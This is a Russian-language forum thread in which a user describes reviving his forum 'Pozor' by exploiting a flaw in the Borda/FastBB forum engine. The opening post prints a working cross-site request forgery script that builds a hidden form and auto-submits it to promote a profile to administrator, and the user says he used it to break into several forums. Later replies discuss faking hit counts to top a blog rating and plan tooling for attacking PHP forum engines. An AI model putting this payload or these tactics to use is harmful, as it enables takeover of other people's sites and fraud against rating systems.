Я возрождаю Позор http://pozor.borda.ru/

Форум » Анонсы Борды » Я возрождаю Позор http://pozor.borda.ru/ » Ответить

Я возрождаю Позор http://pozor.borda.ru/

Кот Бегемот: http://pozor.borda.ru/ [quote]Сегодня, ценой уязвимости Борды, я вернул к жизни Позор. Вчера вечером я написал Кейсу в ЛС на ФТП, что нашел уязвимость в Борде. Ответа не получил, и сегодня утром создал тему на ФТП, в которой написал тоже о том что нашел уязвимость, и хочу с кейсом об этом поговорить. Потом написал ему в асю. Я предложил ему слить всю инфу об уязвимости, в обмен на ГПФ от Позора и ФриЗоны. Он к моему предложению отнесся скептически; попросил взломать какой-нибудь форум на движке FastBB. Я отказался, т.к. ломать моим способом долго, трудно и кейс легко спалит. Тогда он послал на хуй и вообще отказался со мной разговаривать. Но мне такая уязвимость все равно не нужна, которой из 100 форумов ломается всего 1, и я слил кейсу скрипт для взлома Борды: Скрытый текст function fastbb_hack(prof_url){ prof_url = prof_url.split('?'); forum_url = prof_url[0]; profile = prof_url[1].split('-'); document.write('<FORM action="'+forum_url+'" method=POST name=theForm>'); document.write('<input type=hidden name="work" value="32">'); document.write('<input type=hidden name="razdel" value="'+profile[1]+'">'); document.write('<input type=hidden name="avrrasgh" value="2">'); document.write('<input type=hidden name="group" value="4">'); document.write('<input type=hidden name="zvanie" value="">'); document.write('<input type=hidden name="fio" value="">'); document.write('<input type=hidden name="town" value="">'); document.write('<input type=hidden name="strana" value="">'); document.write('<input type=hidden name="email" value="">'); document.write('<input type=hidden name="url" value="">'); document.write('<input type=hidden name="icq" value="">'); document.write('<input type=hidden name="gender" value="1">'); document.write('<input type=hidden name="dr" value="08.03.1987">'); document.write('<input type=hidden name="urlfoto" value="">'); document.write('<input type=hidden name="doppoletxt" value="">'); document.write('<input type=hidden name="pod" value="">'); document.write('<input type=hidden name="newpass" value="">'); document.write('<input type=hidden name="oldpass" value="">'); document.write('<input type=hidden name="admmess" value="">'); document.write('</FORM>'); window.open('http://lleo.aha.ru/na/ua/');theForm.submit();setTimeout('window.close()', 500); } Он ответил, что это не уязвимость. Я сказал, что сломал этим несколько форумов. Кейс предложил взломать ФТП. Я не надеялся уже получить ГПФ, и просто чтобы доказать свою правоту, заслал ему ссылку со скриптом для взлома. На пять минут я получил права админа на ФТП. Скрины: http://s55.radikal.ru/i150/0908/33/af208b549bcb.jpg http://i078.radikal.ru/0908/3c/d6d8eea25e77.jpg Тогда до Кейса доперло в чем уязвимость, он поблагодарил, уязвимость сразу же закрыл, меня понизил. Чего я никак не ожидал - Кейс дал мне ГПФ от Позора. Что ж. Будем возрождать! На данный момент проведены следующие действия по восстановлению форума: Во-первых, я сразу сменил ГПФ. Потом я вернул себе свой профиль. Повысил Aliss до модератора. Она удалила из каталога мертвые форумы, флуд. Я почистил разделы общения и взлома. Вернул дизайн. После трех лет я вернул свой форум... тогда как ролевики делают это за пять минут, через того же Кейса. Я рад. Кейсу спасибо. Будем возрождать Позор! Сразу хочу отметить, что никакими взломами на Борде мы заниматься не будем: ни ломать Борду, ни обсуждать взломы на Борде. Скорее всего, вопросы взлома будут решаться на закрытом форуме на каком-нибудь mybb. Этот форум будем использовать как каталог и курилку. Еще, хочу предупредить: никаких хакерских тимов, типа Цитрусов, Фхтагна, и т.п. создаваться НЕ БУДЕТ!!! Поскольку, я считаю, что взлом - занятие строго индивидуальное; пусть каждый сам решает, что ломать ему а что нет, сам осуществляет взлом, рассчитывая только на свои силы, и сам несет за него ответственность. Тогда будет порядок. Немного о планах на развитие проекта. Каталог будет переквалифицирован с каталога позорных форумов, на каталог позорных ресурсов ВСЕГО интернета. Уберем старые разделы и категории позорности; оценка позорности будет осуществляться голосованием среди участников, решение выноситься администратором или модератором. Обоснование позорности добавляющий должен дать самостоятельно, как можно более развернутое. Уродский дизайн, как обоснование позорности, приниматься не будет. В общем это все, что я хотел сказать.[/quote] http://pozor.borda.ru/

Ответов - 51, стр: 1 2 3 All

Лорд Артур: Орлов Александр пишет: Лорд у тебя новая возлюблиная?)) а я и не знал... А как же сан священника? =) Надеюсь, Бог простит:) Орлов Александр пишет: Тебе что надо хиты или хосты? Хиты дам так. А хосты за деньги. Мне надо 1-е место в рейтинге блогов:) Можешь?

Орлов Александр: Гы. А тебя не забанят за накрутку? Давай адрес рейта и днява. Посмотрим что можно сделать.

Орлов Александр: Как же мне хреново если бы вы знали... Скорее бы пережить бы весну...

Лорд Артур: Орлов Александр В лс на фтп выслал по поводу жж) Чем тебе так весна не нравится??

Gala: Я отдам позор ели ктото уговорит кейса удалить мой старый взломаный форум!

Орлов Александр: Ага) ща все махом, всей тусовкой ломанемся к Кейсу)) уговаривать)

ABM: А чё бы и нет?

Орлов Александр: Этому ушлепку таксолюбу? Спасибо не надо. Да и Кейсу делать больше нечего, как изначально дохлые форумы восстанавливать... Надо же 1500 хитов с утра. Откуда такая роскошь?

Орлов Александр: Дохлая тема... Дайте админа я наведу порядок на форуме)

Кот Бегемот: Мораль сей басни такова: я получил Позор, а Gala получил новый красивый аватар. Да здравствует Позор! И да, а уязвимости я теперь знаю целых две.

Кот Бегемот: Скажем так: я знаю общую уязвимость 90% движков на php. Только использовать ее геморно, там надо админу ссылку пихать, и чтобы он по ней перешел, а код который на ссылке висит надо за месяц готовить. И если админ спалит, то пиздец. Как время будет, попробую закодить че нибудь, чтобы ускорить процесс взлома в будущем.

полная версия страницы